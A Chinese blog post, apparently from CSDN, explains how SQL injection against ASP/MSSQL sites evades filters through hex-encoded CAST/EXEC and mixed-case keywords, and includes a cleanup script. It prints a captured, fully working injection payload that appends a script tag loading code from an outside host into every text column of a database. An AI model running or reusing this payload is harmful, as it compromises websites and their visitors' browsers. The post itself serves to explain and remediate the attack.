关于SQL注入

最新推荐文章于 2024-09-21 10:25:52 发布
最新推荐文章于 2024-09-21 10:25:52 发布
阅读量813 收藏
点赞数
文章标签: sql c 数据库 asp 脚本 table
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/WDFrog/article/details/6176808
版权

  

   有一些程序,尤其是asp程序,对提交参数的验证不严格导致SQL注入漏洞的存在,通常情况下的过滤都会替换单引号 ['],因此很多注入方式就采用将SQL 语句进行Unicode编码(16进制)后再使用Cast还原,然后采用Exec(@SQL)这样动态方式执行,MSSQL里面很多输入参数是字符串类型的函数同时支持字符串的Unicode编码输入.如:
IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) ,跟 IS_SRVROLEMEMBER('systemadmin') 是等价的,  0x7300 是"s" 的unicode的16进制表示方式,而7900着对应"y"(双字节,字母的高位字节是0),采用这样的方式就可以避免使用单引号,也可以避免一些不严格的sql过滤.

 下面是记录到的一次数据库挂马代码:
 --===========================---

;DeCLaRE @S NvArCHaR(4000);SeT @S=CaSt(0x4400650063006C0061007200650020004000540020005600610072006300680061007200280032003500350029002C0040004300200056006100720063006800610072002800320035003500290020004400650063006C0061007200650020005400610062006C0065005F0043007500720073006F007200200043007500720073006F007200200046006F0072002000530065006C00650063007400200041002E004E0061006D0065002C0042002E004E0061006D0065002000460072006F006D0020005300790073006F0062006A006500630074007300200041002C0053007900730063006F006C0075006D006E00730020004200200057006800650072006500200041002E00490064003D0042002E0049006400200041006E006400200041002E00580074007900700065003D00270075002700200041006E0064002000280042002E00580074007900700065003D003900390020004F007200200042002E00580074007900700065003D003300350020004F007200200042002E00580074007900700065003D0032003300310020004F007200200042002E00580074007900700065003D00310036003700290020004F00700065006E0020005400610062006C0065005F0043007500720073006F00720020004600650074006300680020004E006500780074002000460072006F006D00200020005400610062006C0065005F0043007500720073006F007200200049006E0074006F002000400054002C004000430020005700680069006C006500280040004000460065007400630068005F005300740061007400750073003D0030002900200042006500670069006E00200045007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200053006500740020005B0027002B00400043002B0027005D003D0052007400720069006D00280043006F006E007600650072007400280056006100720063006800610072002800380030003000300029002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F003300620033002E006F00720067002F0063002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600650074006300680020004E006500780074002000460072006F006D00200020005400610062006C0065005F0043007500720073006F007200200049006E0074006F002000400054002C0040004300200045006E006400200043006C006F007300650020005400610062006C0065005F0043007500720073006F00720020004400650061006C006C006F00630061007400650020005400610062006C0065005F0043007500720073006F007200 aS NvArChAR(4000));ExEc(@S);--
--========================--
Cast函数返回的是一组SQL语句,这个组SQL脚本使用游标的方式将数据库中的每张表,每条记录的字段是文本类型加上一个<script srx='xxxx'></script>这样的脚本引用,另外关键字拼写时采用大小写混合的方式,目的还是为了躲避一些过滤, 因为说到asp语法大家都知道他是不区分大小写的,但是asp中的很多字符串处理函数其实是大小写敏感的,
如Instr(strv,"declare") ,默认情况下进行的是进行二进制比较(区分大小写)如果strv="DEcLaRE"就会被忽悠过去.

下面是清理被挂马数据库的一段脚本,SQL2005版的,SQL2000的需要调整下变量类型

 

DECLARE @TableName nvarchar(200), @ColumnName nvarchar(200) Declare @SQL nvarchar(1000) Set @SQL='' DECLARE C_cursor CURSOR FOR Select Table_Name,Column_Name From INFORMATION_SCHEMA.COLUMNS where (Data_Type='nvarchar' Or Data_Type='ntext' Or Data_Type='varchar' Or Data_type='text' ) OPEN C_cursor FETCH NEXT FROM C_cursor INTO @TableName, @ColumnName -- Check @@FETCH_STATUS to see if there are any more rows to fetch. WHILE @@FETCH_STATUS = 0 BEGIN -----------数据处理代码------ Set @SQL=' Update ' + @TableName +' Set ' + @ColumnName + ' = Replace( cast(' + @ColumnName +' as nvarchar(max)),''<script src=http://3b3.org/c-1111.js></script>'','''') ' Exec( @SQL) -------------------------------- FETCH NEXT FROM C_cursor INTO @TableName, @ColumnName End CLOSE C_cursor DEALLOCATE C_cursor
WDFrog
关注
sql注入实例分析
weixin_30624825的博客
07-23 3460
什么是SQL注入攻击?引用百度百科的解释: sql注入_百度百科: 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执...
关于SQL注入,绕过逗号过滤
weixin_43247256的博客
01-27 7069
CTF sql注入题目。
SQL注入——盲注
Forever8023的博客
05-21 402
SQL盲注 首先让我们一起来了解一下SQL注入的原理: SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。 接下来就是如何防范: 1.永远不要信任用户的输入。对用户的输入进行校验,可以通过正则表达式,或限制长度;对单引号和双"-"进...
使用CAST来SQL注入
dogfish的专栏
01-23 2850
自己的网站曾经经历过这种SQL注入。所以把一个例子放在这里,以便日后查询。 进行SQL注入的人会在你的url上加入如下的数据。 ;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0×4445434C415245204054207661726368617228323535292C4043207661263686172283430303029204445
三种数据库SQL 注入详解
YT的博客
02-25 11万+
SQL 注入原理 SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。 SQL 注入分类 1. 数字型注入 当输入的参数为整型时,则有可能存在数字型注入漏洞。 假设存在一条 URL 为:HTTP://www.aaa.com/test...
SQL注入详解(全网最全,万字长文)
m0_56691564的博客
10-23 3万+
一些概念:SQL:用于数据库中的标准数据查询语言。 web分为前端和后端,前端负责进行展示,后端负责处理来自前端的请求并提供前端展示的资源。而数据库就是存储资源的地方。而服务器获取数据的方法就是使用SQL语句进行查询获取。
sql注入详解
热门推荐
内心不种满鲜花就会长满杂草
05-05 21万+
SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...
关于SQL注入的一些分析
whoim_i的博客
10-29 1万+
一、sql注入原理 SQL 注入就是指 web 应用程序对用户输入的数据合法性没有过滤或者是判断,前端传入的参数是攻击者可以控制,并且参数带入数据库的查询,攻击者可以通过构造恶意的 sql 语句来实现对数据库的任意操作。 举例说明: id=id=id=_GET[‘id’] sql=SELECT∗FROMusersWHEREid=sql=SELECT * FROM users WHERE id=sq...
关于mysql注入说法正确的是_关于SQL注入攻击,下面的说法正确的有()。
weixin_30910583的博客
02-07 3259
SQL注入原理深度解析 作者:admin 文章来源:转载 点击数:699 更新时间:2008-8-29 -------------------------------------------------------------------------------- 对于Web应用来说,注射式攻击由来已久,攻击方式也五花八门,常见的攻击方式有SQL注射、命令注射以及新近才出现的X...
关于sql注入这一篇就够了(适合入门)
qq_53105813的博客
01-07 5327
sql注入详解
关于SQL注入与避免
12-14
SQL注入是一种针对Web应用程序的安全漏洞,它允许攻击者通过注入恶意SQL代码来操纵数据库,获取敏感信息,执行非法操作,甚至获取系统级别的权限。这种攻击通常发生在开发人员未能正确过滤和验证用户输入的情况下。 ...
关于sql注入的简要演示(入坑抛砖)
09-09
SQL注入是一种常见的网络安全漏洞,它发生在应用程序未能正确过滤或验证用户输入的数据时,允许攻击者插入恶意的SQL语句到应用程序的查询中。本文将通过一个简单的示例来解释SQL注入的工作原理和演示如何利用它。 ...
关于SQL注入绕过的一些知识点
09-09
网上关于SQL注入的绕过技巧有很多,最近正好空下来,想着整理下关于SQL注入绕过的一些姿势。欢迎大牛补充,下面这篇文章主要介绍了关于SQL注入绕过的一些知识点,总结的还是相对比较全面的,需要的朋友可以参考下。
关于SQL注入的详细解析
07-11
SQL注入的详细解析
关于SQL注入的简单案例
10-27
SQL注入的简单案例 SQL注入是一种常见的网站攻击方式,它通过把恶意的SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。SQL注入的产生条件是有参数传递参数值带入...
SQL - 进阶语法(一)
最新发布
qq_51222843的博客
09-21 270
关于SQL的进阶语法教程,包括简单合并数据库,修改数据库内容等操作
web基础—dvwa靶场(八)SQL Injection(Blind)
m0_74080781的博客
09-18 1177
SQL Injection(Blind),SQL盲注,相比于常规的SQL注入,他不会将返回具体的数据信息或语法信息,只会将服务器包装后的信息返回到页面中。
text2sql(NL2Sql)综述《The Dawn of Natural Language to SQL: Are We Fully Ready?》
beingstrong的博客
09-15 1033
text2sql(NL2Sql)综述《The Dawn of Natural Language to SQL: Are We Fully Ready?》详细笔记
mysql学习教程,从入门到精通,SQL 删除数据(DELETE 语句)(18)
qq_45746668的博客
09-18 986
在编写SQL中的`DELETE`语句时,需要非常小心,因为一旦执行,被删除的数据就无法恢复了(除非你有备份)。`DELETE`语句用于从数据库表中移除一条或多条记录。这里,我将提供一个基本的`DELETE`语句的示例,并解释如何安全地使用它。
关于sql注入的面试题
05-26
好的,以下是一个关于 SQL 注入的面试题: 问题:什么是 SQL 注入?如何防止 SQL 注入攻击? 回答: SQL 注入是一种常见的网络攻击,攻击者利用应用程序对用户输入数据的处理不当,将恶意 SQL 代码注入到应用程序中,以达到攻击的目的。攻击者可以通过 SQL 注入攻击获取敏感数据、修改数据库中的数据甚至控制整个服务器。 防止 SQL 注入攻击有以下几个方法: 1. 使用参数化查询:参数化查询可以防止 SQL 注入攻击,因为参数化查询使用变量来代替 SQL 查询语句中的值,这样攻击者无法通过注入恶意代码来修改查询语句。使用参数化查询可以在应用程序和数据库之间建立一个安全的隔离层。 2. 过滤用户输入:在应用程序中,对用户输入的数据进行过滤和校验,只允许特定的字符和格式。这样可以避免攻击者注入恶意代码。 3. 限制用户权限:在数据库中,限制用户的权限,只允许他们执行特定的操作。这样可以限制攻击者的影响范围,一旦攻击者成功注入恶意代码,也只能执行被授权的操作。 4. 更新软件和补丁:定期更新应用程序和数据库的软件和补丁,以及其他相关的软件和组件,可以减少 SQL 注入攻击的风险。 以上是一些防止 SQL 注入攻击的方法,但并不能保证绝对安全,因此还需要定期对系统进行安全审计和漏洞扫描。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值